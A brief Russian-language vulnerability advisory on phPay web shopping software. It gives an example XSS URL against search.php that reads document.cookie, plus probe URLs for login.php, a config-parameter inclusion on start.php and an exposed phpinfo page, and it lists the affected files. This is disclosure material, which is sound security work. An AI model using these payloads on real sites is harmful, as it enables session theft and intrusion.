Множественные уязвимости в phPay web shopping.

ALPER Research Labs сообщил, что программное обеспечение не фильтрует HTML код в данных, представленных пользователем в сценарии 'search.php'. Уязвимость может использоваться для кражи опознавательных данных, хранящихся в Куки целевого пользователя, кликнувшего на специально сформированную ссылку. Пример:

http://[TARGET]/search.php?sess=your_session_id&lookfor=<script>alert
(document.cookie)< /script>

 
http://[TARGET]/login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang

http://[TARGET]/start.php?config=alper.inc.php

 /admin/phpinfo.php

/doc/addon-index.php, detail.php, fpass.php, header.inc.php, main.php, nav.php, 
pay.php, payed.php, publicpay.inc.php, reguser.php, search.php, server.php, 
view_cart.php, lib.inc.php, show_size.inc.php, limit.navi.inc.php, mailer.inc.php, 
show_cart.inc.php, stats.php, show_color.inc.php, show_content.inc.php, 
show_item_0.inc.php, show_item_1.inc.php, show_item_x.inc.php, show_item_2.inc.php, 
and others.